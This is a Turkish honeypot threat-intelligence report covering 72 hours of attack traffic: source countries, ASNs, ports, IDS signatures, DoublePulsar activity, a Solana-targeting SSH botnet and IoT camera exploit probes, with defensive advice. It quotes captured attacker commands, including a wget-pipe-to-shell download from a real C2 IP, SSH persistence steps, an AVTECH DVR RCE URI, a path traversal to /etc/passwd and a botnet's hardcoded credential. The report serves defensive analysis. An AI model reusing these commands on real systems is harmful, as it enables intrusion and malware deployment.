← Tüm Yazılar
HIGH 8 Nisan 2026

72 Saatte 2.8 Milyon Olay — Kripto Madencileri, NSA Exploit'leri ve Zombi Ağları

İstanbul honeypot ağından ikinci güncelleme: 16.964 benzersiz saldırgan, Solana madencilik botnet'i, DoublePulsar hâlâ aktif, IoT kamera exploit zincirleri ve MikroTik API taraması. OPSEC-filtrelenmiş ham istihbarat.

Özet

İlk rapordan 24 saat sonra yeni bir güncelleme. Sistem yeniden başlatıldıktan sonraki 72 saatlik pencere — ve sayılar çarpıcı:

MetrikDeğer
Toplam olay (OPSEC-filtered)2.851.855
Benzersiz saldırgan IP16.964
Aktif honeypot sensörü14
Veri penceresi72 saat (5-8 Nisan 2026)
Günlük ortalama~950.000 olay
Zirve gün7 Nisan — 1.283.086 olay

OPSEC filtresinden geçmiş, iç altyapı adresleri ve pasif fingerprinter gürültüsü arındırılmış veri. Geriye kalan: saf saldırı trafiği.

72 saat, 16.964 benzersiz IP. Dakikada 4 yeni saldırgan.

Bu güncellemede üç ana bulgu var: birincisi kripto madencilik odaklı yeni bir botnet ailesi, ikincisi 2017’den kalma NSA exploit’inin hâlâ aktif kullanımı, üçüncüsü IoT cihazları hedef alan koordineli exploit zinciri.

Tüm IoC verilerine Feed Hub’dan ulaşabilirsiniz. İlk hafta raporunu okumadıysanız oradan başlamanızı öneririz.


Günlük Trend: Yükselen Dalga

TarihOlay (filtered)Değişim
5 Nisan70.928— (başlangıç, yarım gün)
6 Nisan443.426+525%
7 Nisan1.283.086+189%
8 Nisan1.055.252-18% (gün devam ediyor)

7 Nisan zirvesi dikkat çekici. İlk gün yarım olsa da, 6→7 Nisan geçişindeki %189 artış organik keşif sürecinin ötesinde. Muhtemelen bir tarama botnet’i sensörlerin IP bloğunu hedef listesine ekledi.


Sensör Dağılımı: Ne Yakaladık?

14 aktif honeypot sensörü farklı katmanlarda farklı davranışlar yakalıyor:

Ağ Katmanı

SensörOlayGörev
Suricata (IDS)2.769.938Paket seviyesinde imza eşleştirme — Emerging Threats kural seti
Glutton41.303Multi-protokol tuzak — SSH, HTTP, FTP, SMTP emülasyonu

Etkileşim Katmanı

SensörOlayGörev
Cowrie31.699SSH/Telnet honeypot — brute force + post-exploitation komut kaydı
Dionaea3.299Malware yakalayıcı — SMB, HTTP, FTP exploit emülasyonu
Sentrypeer3.016VoIP/SIP tuzağı — premium rate fraud taraması
Honeytrap1.529Genel port dinleyici — tanımlanamayan bağlantıları yakalar
Mailoney766SMTP tuzağı — open relay avcılığı, spam kampanya keşfi
Tanner543Web uygulama tuzağı — LFI, RCE, credential harvesting emülasyonu

Düşük Hacim — Yüksek Kalite

SensörOlayGörev
H0neytr4p138SSL/TLS tuzağı
ElasticPot45Açık Elasticsearch avcılığı — data leak hedefli tarama
ConPot21ICS/SCADA — endüstriyel kontrol sistemi emülasyonu
Honeyaml11YAML tabanlı multi-servis emülatörü
Adbhoney2Android Debug Bridge — akıllı telefon/TV hedefli saldırı
Miniprint2Yazıcı exploit emülasyonu — ağ yazıcısı hedefli tarama

Olay sayısı düşük olan sensörler, sinyal kalitesi en yüksek olanlar. ElasticPot’a ulaşan 45 bağlantı, açık Elasticsearch instance’ı arayan ve veri sızdırmak isteyen operatörlere işaret ediyor. ConPot’a gelen 21 bağlantı ICS/SCADA hedefli — enerji, su arıtma, üretim tesisleri hedefinde.


Kaynak Ülke Analizi

#ÜlkeOlayOran
1ABD496.771%17.4
2Vietnam440.277%15.4
3Brezilya339.436%11.9
4Fransa305.384%10.7
5Çin220.581%7.7
6Almanya208.132%7.3
7Endonezya182.054%6.4
8İngiltere159.104%5.6
9Hindistan101.498%3.6
10Meksika78.336%2.7
11İsveç36.135%1.3
12Pakistan35.526%1.2
13Hollanda33.734%1.2
14Singapur28.139%1.0
15Hong Kong20.587%0.7

Vietnam ikinci sıraya yükseldi. İlk raporda beş-altıncı sıralardaydı — 72 saatte %15.4 oranla ABD’ye yaklaştı. Vietnam kaynaklı trafiğin %94’ü tek bir ASN’den (FPT Telecom — 146.285 olay) geliyor. Bu, büyük ISP müşteri ağında yaygın enfeksiyon veya koordineli botnet aktivitesi anlamına geliyor.

Meksika’nın varlığı da dikkat çekici. Total Play Telecomunicaciones (78.000 olay) tek başına bir ülke gibi trafik üretiyor.


Saldırgan Altyapı: ASN Profilleri

#ASNOlayYorum
1GoDaddy.com, LLC315.775VPS abuse — hosting sağlayıcı
2GLOBAL CONECTA TELECOM299.339Brezilya ISP — enfekte müşteriler
3INTERDIGI JSC290.734Vietnam telecom
4Chinanet194.582Çin devlet ISP — klasik kaynak
5Contabo GmbH194.070Alman VPS — bulletproof hosting şüphelisi
6PT Aplikanusa Lintasarta177.674Endonezya ISP
7Neue Medien Muennich GmbH174.356Alman hosting — tek IP dominant
8WHG Hosting Services Ltd153.356İngiliz hosting
9FPT Telecom146.285Vietnam ISP — tek ASN’den 440K ülke trafiğinin %33’ü
10Hostinger International98.414VPS abuse
11Oracle Corporation81.076Oracle Cloud free tier abuse
12Hostnet B.V.78.755Hollanda hosting
13Total Play Telecom77.985Meksika ISP
14Modat B.V.50.697Bilinen bulletproof hosting
15Amazon.com, Inc.33.576AWS free tier / compromised instances

Modat B.V. ilk rapordan tanıdık — 50.697 olay ile hâlâ aktif. İlk haftada trafiğin %35’ini üretiyordu, bu pencerede %1.8’e düşmüş görünüyor ama dikkat: ilk haftanın veri hacmi çok daha düşüktü. Mutlak sayı artmış olabilir.

Contabo sürpriz yüksek sırada. Alman VPS sağlayıcısı, abuse raporlarına müdahale süresi yavaş olarak biliniyor. 194.000 olay ciddi bir hacim — muhtemelen birden fazla kiralık VPS botnet node’u olarak kullanılıyor.

Oracle Cloud free tier’ın abuse’a açık olduğu bilinen bir sorun. 81.000 olay ile bu veriyi teyit ediyoruz.


Hedef Port Analizi

PortOlayServisRisk Seviyesi
532.089.769DNSDNS amplification / DDoS reflektör
1080193.508SOCKS ProxyAçık proxy avcılığı
590078.799VNCUzak masaüstü — şifresiz erişim
44327.493HTTPSWeb servis keşfi + exploit
506026.906SIP/VoIPPremium rate fraud
2224.095SSHBrute force + CVE exploit
44520.943SMBEternalBlue / DoublePulsar
807.258HTTPWeb keşif
87286.248MikroTik APIRouterOS hedefli saldırı
80806.141HTTP AltProxy / admin panel
254.094SMTPOpen relay / spam
33892.622RDPWindows uzak masaüstü
80882.081HTTP AltHadoop / YARN exploit
1611.910SNMPAğ cihazı keşfi
33061.465MySQLVeritabanı hedefli
231.273TelnetIoT botnet (Mirai varyantları)
14331.215MSSQLWindows DB hedefli

DNS: 2 Milyon Olayın Hikayesi

Port 53 açık farkla birinci — toplam trafiğin %73’ü. Bu honeypot’ların DNS sunucusu gibi davranıp davranmadığını test eden saldırganlar. Amaç: amplification saldırısı için reflektör bulmak.

DNS amplification’da saldırgan küçük bir sorgu gönderiyor, DNS sunucusu 50-100 kat büyük yanıt veriyor, bu yanıt sahte kaynak IP’ye yönleniyor. Suricata bu kalıbı ET DOS DNS Amplification Attack Inbound imzasıyla 1.014 kez tespit etti.

SOCKS Proxy: Gizlenme Altyapısı

193.508 olay ile port 1080 ikinci sırada. SOCKS proxy arayan saldırganlar, bulduklarında trafiğini bu proxy üzerinden yönlendirerek gerçek IP’sini gizliyor. Suricata GPL INFO SOCKS Proxy attempt imzasını 153.624 kez tetikledi.

VNC: Şifresiz Uzak Masaüstü

78.799 olay. VNC sunucuları genellikle şifresiz veya zayıf şifreyle açık bırakılıyor. Suricata GPL INFO VNC server response imzasıyla 52.126 event — yani saldırganlar VNC banner’ını alıp authentication denemesine geçiyor.

MikroTik API: Router Botnet Altyapısı

Port 8728 ile 6.248 olay — RouterOS API portu. Türkiye, Doğu Avrupa ve Güneydoğu Asya ISP altyapısının büyük bölümü MikroTik tabanlı. Bu portun taranması, router’ları botnet altyapısına çevirmek için ilk adım.

Glutton sensöründe port 8728 en çok taranan port — 1.886 etkileşimli bağlantı girişimi. Saldırganlar sadece port açık mı diye bakmıyor, API komutları gönderiyor.


Suricata IDS: İmza Bazlı Tehdit Analizi

Kritik Tespitler

İmzaOlayTehdit
SOCKS Proxy attempt153.624Proxy abuse altyapısı
VNC server response52.126Şifresiz uzak erişim
ICMP PING39.155Keşif / alive check
DoublePulsar Backdoor7.941NSA exploit — SMB backdoor
DShield Block Listed7.398Bilinen kötü IP’ler
SSH Scan2.096Brute force keşfi
/etc/passwd in URI1.515Local File Inclusion (LFI)
NMAP -sS1.505SYN tarama
DNS Amplification Attack1.014DDoS reflektör

DoublePulsar: 2017 NSA Exploit’i Hâlâ Yaşıyor

7.941 DoublePulsar tespit — bu 2017’de Shadow Brokers tarafından sızdırılan NSA exploit’i. WannaCry ve NotPetya saldırılarında kullanıldı. Aradan 9 yıl geçti.

İki kaynak IP tüm trafiği üretiyor:

  • 216.82.43.156 (ABD): 6.503 deneme — tek başına haftanın en ısrarcı exploit operatörü
  • 103.109.220.214 (Hindistan): 1.438 deneme

Hedef: Port 445 (SMB). Payload: DoublePulsar backdoor kurulum paketi. Bu IP’ler Windows sistemlerde SMBv1 açık olan makineler arıyor. Bulduklarında backdoor yüklüyor, sonra ransomware veya cryptominer deploy ediyorlar.

Pratik savunma: SMBv1’i devre dışı bırakın. Windows Firewall’da port 445’i dış erişime kapatın. MS17-010 yamasını kontrol edin — 2017’den beri mevcut.

LFI Saldırıları: /etc/passwd Avcılığı

1.515 olay. Web sunucularda ../../etc/passwd path traversal denemesi. Başarılı olursa sistem kullanıcı listesini sızdırıyor, ardından SSH brute force için kullanıcı adı listesi elde ediyorlar.


SSH Honeypot (Cowrie): Saldırganların İç Yüzü

31.699 etkileşimli SSH olayı. Cowrie saldırganların hem giriş denemelerini hem de başarılı girişten sonraki komutlarını kaydediyor.

Kullanıcı Adı Sözlüğü

#Kullanıcı AdıDenemeYorum
1root1.435Her zaman birinci
2ubuntu208Cloud VM hedefi (AWS/GCP/Azure default)
3345gs5662d34204Botnet hardcoded credential
4admin90Genel yönetici
5sol67Solana kripto madencilik
6operator59ICS/SCADA default
7test54Geçici hesap hedefi
8ftpuser48FTP sunucu hedefi
9steam48Gaming sunucu — GPU madencilik hedefi
10user48Genel
11postgres43Veritabanı hedefi
12solana40Solana node/validator
13support39Destek hesabı hedefi
14ali38Bölgesel (Ortadoğu/Türkiye/Güneydoğu Asya)
15supervisor36Docker/Process manager
16deploy33CI/CD pipeline hedefi
17guest30Misafir hesabı
18default27Default credential
19oracle26Oracle DB hedefi
20solv26Solana Validator node

Şifre Sözlüğü

#ŞifreDenemeYorum
1345gs5662d34204Botnet hardcoded — aynı zamanda kullanıcı adı!
23245gs5662d34202Varyant — typo toleransı
312345686Evergreen #1
412338Minimal
5solana35Kripto madenci şifresi
6admin29Default
7123427
81234567822
9ubuntu22Cloud default
10test19
1111223318
12p@ssw0rd17Leet speak klasik
13root17
14password16
15sol14Kripto kısaltma

Bulgu 1: Solana Kripto Madencilik Botnet’i

sol, solana, solv — toplam 133 kullanıcı adı + 49 şifre denemesi. Bu klasik SSH sözlük saldırısı değil. Saldırganlar Solana blockchain validator veya madencilik node’u çalıştıran sunucuları hedefliyor.

Solana validator’ları genellikle yüksek CPU/GPU kapasiteli sunucularda çalışıyor — bu makineler kripto madencilik için ideal. Saldırgan planı: Solana node’unu bul → SSH ile gir → kendi madencini yükle → mevcut kripto altyapısını ele geçir.

steam kullanıcı adının 48 denemesi de aynı motivasyonla açıklanıyor. Gaming sunucuları GPU yoğun — madencilik için biçilmiş kaftan.

Bulgu 2: 345gs5662d34 — Botnet Hardcoded Credential

Bu dize hem kullanıcı adı (204) hem şifre (204+202 varyant) olarak kullanılıyor. Mirai ve türevi IoT botnet’lerde hardcoded credential olarak bilinen bir kalıp. Aynı dizeyi giriş bilgisi olarak gönderen 200+ deneme, aynı botnet framework’ünü kullanan dağıtık node’lara işaret ediyor.

Post-Exploitation: “İçeri Girdikten Sonra Ne Yapıyorlar?”

Cowrie saldırganların giriş sonrası çalıştırdığı komutları da kaydediyor. En sık çalışan komut dizisi:

Aşama 1 — Keşif (~220 kez tekrarlanmış):

cat /proc/cpuinfo | grep name | wc -l    # Kaç CPU çekirdeği var?
free -m | grep Mem                        # Ne kadar RAM?
lscpu | grep Model                        # CPU modeli ne?
df -h | head -n 2                         # Disk alanı
uname -a                                  # Kernel versiyonu
whoami                                    # Hangi kullanıcı?

Bu keşif profili tek bir soruyu yanıtlıyor: “Bu makine kripto madenciliğe uygun mu?” CPU çekirdek sayısı, RAM kapasitesi, disk alanı — madencilik kârlılık hesabı için gereken üç metrik.

Aşama 2 — Kalıcılık (~218 kez):

cd ~; chattr -ia .ssh; lockr -ia .ssh     # SSH key korumalarını kaldır
crontab -l                                 # Mevcut zamanlanmış görevleri kontrol et

chattr -ia .ssh komutu kritik: SSH dizininin immutable ve append-only flag’lerini kaldırıyor. Amaç: kendi SSH key’lerini authorized_keys’e eklemek ve kalıcı erişim sağlamak. lockr özel bir araç — bazı güvenlik yazılımlarının SSH dizinine koyduğu kilidi kaldırıyor.

Aşama 3 — Rakip Temizliği (~95 kez):

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh
pkill -9 secure.sh; pkill -9 auth.sh
echo > /etc/hosts.deny; pkill -9 sleep

Bu komut dizisi rakip botnet’leri temizliyor. secure.sh ve auth.sh diğer botnet’lerin persistence script’leri. Saldırgan önce rakip çıkarıyor, sonra kendi payload’ını yüklüyor. hosts.deny dosyasını boşaltmak, önceki operatörün IP engellemelerini kaldırıyor.

Aşama 4 — Payload İndirme:

wget -qO- http://196.251.107.133/bins/sin.sh | sh

Bu IP (Afrika bölgesi) bir C2 (Command & Control) sunucusu. sin.sh script’i muhtemelen mimari tespiti yapıp uygun binary’yi indiriyor. Mirai türevi botnet — IoT ve Linux sunucuları hedefliyor.

Aynı kalıpta farklı indirme yöntemleri de deneniyor:

# wget başarısız olursa busybox wget dene
busybox wget -T 9 -qO- http://[C2]/bins/sin.sh | sh &

Web Saldırıları (Tanner): Exploit Kataloğu

543 web etkileşimi, her biri farklı bir saldırı vektörü:

IoT Kamera Exploit Zinciri — AVTECH DVR RCE

65 olay — en yoğun web saldırı vektörü:

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___

Bu, AVTECH DVR ve IP kamera sistemlerindeki uzak kod çalıştırma (RCE) zafiyeti. S_O_S_T_R_E_A_MAX komutu ile shell access elde ediliyor. Payload’da iki farklı C2 sunucusu tespit ettik:

  • C2 #1: Payload bbc — muhtemelen x86/x64 Linux botnet binary
  • C2 #2: Payload kkk.arm7ARM mimarisi hedefli, kamera/DVR işlemcilerine özel

ARM payload’ının varlığı önemli: saldırganlar genel sunucu değil, spesifik olarak IoT cihazları hedefliyor. Kamera → botnet node → DDoS silahı.

Hikvision SDK Exploit

5 olay/SDK/webLanguage endpoint’ine erişim denemesi. CVE-2021-36260 — Hikvision IP kameralarında kritik RCE zafiyeti. 2021’de yayımlandı, hâlâ aktif olarak taranıyor.

Credential Harvesting

PathOlayHedef
/admin/config.php6FreePBX yönetim paneli
/.vscode/sftp.json4Geliştirici FTP credential’ları
/adminer.php2Veritabanı yönetim aracı
/boaform/admin/formLogin2Router/modem admin paneli
/.aws/credentials1AWS Access Key
/recordings/index.php2Telefon kaydı sistemi

.vscode/sftp.json özellikle ilginç. VS Code kullanıcıları SFTP eklentisiyle çalışırken bu dosyada sunucu adresini, kullanıcı adını ve bazen şifreyi düz metin olarak saklıyor. Saldırganlar .vscode dizinini web root’tan erişilebilir bırakmış geliştirici makinelerini arıyor.

.aws/credentials — tek deneme ama en kritik hedef. Bu dosya AWS Access Key ID ve Secret Access Key içeriyor. Başarılı olursa: tüm AWS hesabı — EC2, S3, Lambda, her şey.


Glutton: Protokol Derinliği

41.303 olay ile Glutton’ın en çok hedeflenen portları:

PortEtkileşimServisYorum
87281.886MikroTik APIRouter botnet
8088341YARN ResourceManagerHadoop cluster exploit
88187KerberosActive Directory hedefi
47001156WinRMWindows uzaktan yönetim
47808117BACnetBina otomasyon sistemi!
50070125Hadoop HDFS NameNodeBig data cluster
49665-49667343Windows RPCLateral movement

BACnet (port 47808) en enteresan bulgu. Building Automation and Control Networks — klima, aydınlatma, asansör, yangın alarm sistemlerinin iletişim protokolü. 117 bağlantı girişimi, bina otomasyon sistemlerini hedef alan tarama anlamına geliyor. Kritik altyapı hedeflemesi.

Hadoop YARN + HDFS birlikte taranıyor. Saldırganlar açık Hadoop cluster’larına YARN üzerinden konteyner deploy edip kripto madencisi çalıştırıyor. HDFS’den veri sızdırıyor.


VoIP/SIP: Telefon Dolandırıcılığı Altyapısı

Sentrypeer: 3.016 olay — SIP/VoIP taraması. Port 5060: 26.906 olay — SIP protokolü.

Toplam ~30.000 VoIP hedefli olay. Saldırganlar açık SIP trunk’lar arıyor. Bulduklarında:

  1. Premium rate numaralar aranıyor (dakikası $1-5 arası ücretli hatlar)
  2. Fatura PBX sahibine kesiliyor
  3. Gelir saldırgana aktarılıyor

Bir hafta sonu PBX hack’i onbinlerce dolarlık fatura üretebilir. ISP ve kurumsal PBX operatörleri için SIP trunk güvenliği kritik.


Top Saldırganlar (OPSEC-Filtered)

#IPOlayYorum
1107.180.114.199313.553GoDaddy VPS — otomasyon ağırlıklı
236.50.177.198290.264Vietnam INTERDIGI — botnet node
3109.199.98.14192.824Fransa — yüksek hacimli tarayıcı
4202.97.110.66192.649Chinanet — devlet ISP altyapısı
585.13.152.133174.356Almanya Neue Medien — tek IP dominant
6209.42.22.207153.205WHG Hosting — İngiltere çıkışlı
742.119.236.237146.035FPT Telecom Vietnam — muhtemelen enfekte
893.127.208.12698.252Hostinger — VPS abuse
9192.185.56.22081.035Oracle Cloud — free tier abuse
10185.107.91.7678.755Hostnet Hollanda

#1 — 107.180.114.199 (GoDaddy): 313.553 olay, 72 saatte. Saatte 4.355 bağlantı. Bu tek IP, bazı küçük ülkelerin toplam trafiğinden fazla. GoDaddy VPS’lerinde bot ağı altyapısı kurmak ucuz ve hızlı — $5/ay VPS, otomatik script, binlerce hedef.

#7 — 42.119.236.237 (FPT Telecom Vietnam): ISP müşteri IP’si — muhtemelen enfekte bir ev/ofis yönlendiricisi veya sunucu. Sahibi büyük ihtimalle habersiz. 146.000 olay üreten bir zombi.


Sonuç ve Savunma Önerileri

Acil Eylem Gerektiren 5 Bulgu

1. Solana/Kripto Madencilik Botnet’i Aktif SSH brute force’un yeni nesli artık root/admin değil, sol/solana/solv deniyor. Kripto node’ları ve GPU sunucuları hedefte. Savunma: SSH key-only authentication, fail2ban, port değiştirme.

2. DoublePulsar 9 Yıl Sonra Hâlâ Aktif 7.941 exploit denemesi, 2 kaynak IP. Windows SMBv1 açık olan her makine risk altında. Savunma: SMBv1 devre dışı, port 445 kapalı, MS17-010 yaması.

3. IoT Kameraları Botnet Silahı AVTECH DVR + Hikvision exploit’leri aktif. ARM payload’ları kameraları DDoS node’una çeviriyor. Savunma: kamera firmware güncellemesi, kameraları internetten izole etme, VLAN segmentasyonu.

4. MikroTik Router’lar Hedefte 6.248 API portu taraması. RouterOS API (8728) açıksa router botnet’e katılabilir. Savunma: API portu dışarıdan kapatma, RouterOS güncelleme, güçlü şifre.

5. DNS Amplification Reflektör Avcılığı 2 milyon DNS probe. Açık resolver’lar DDoS silahı olarak kullanılıyor. Savunma: recursive DNS’i dışarıdan kapatma, rate limiting.

Genel Güvenlik Tavsiyeleri

  • SSH: Key-only auth, fail2ban, 22 dışı port, root login kapalı
  • VNC: İnternete açık bırakmayın, VPN arkasına alın, güçlü şifre
  • SOCKS/Proxy: 1080 portunu kapatın, gereksiz proxy servisleri kaldırın
  • Web: .vscode, .aws, .git dizinlerini web root’tan erişilemez yapın
  • VoIP: SIP trunk’larda IP whitelist, uluslararası arama kısıtlaması
  • IoT: Firmware güncel, VLAN segmentasyonu, varsayılan şifre değiştirilmiş

Feed ve IoC Erişimi

Bu rapordaki tüm IoC verileri makine-okunabilir formatlarda mevcut:

  • JSON Feed: /feed/json — SIEM entegrasyonu için
  • CSV Feed: /feed/csv — tablo işleme için
  • STIX 2.1: /feed/stix — TAXII uyumlu platformlar için

API entegrasyonu için dokümantasyon sayfasını ziyaret edin.

Bir sonraki rapor 14 Nisan’da. Modat kümesinin davranış evrimi, Solana botnet’inin kaynak analizi ve RIPE Atlas verisiyle saldırı yolu haritalaması izleyeceğimiz konular.


Bu rapor SiberKale honeypot ağından elde edilen verilere dayanmaktadır. Tüm veriler OPSEC filtresinden geçmiş olup iç altyapı bilgisi içermemektedir. IoC verileri CC0 lisansı ile paylaşılmaktadır.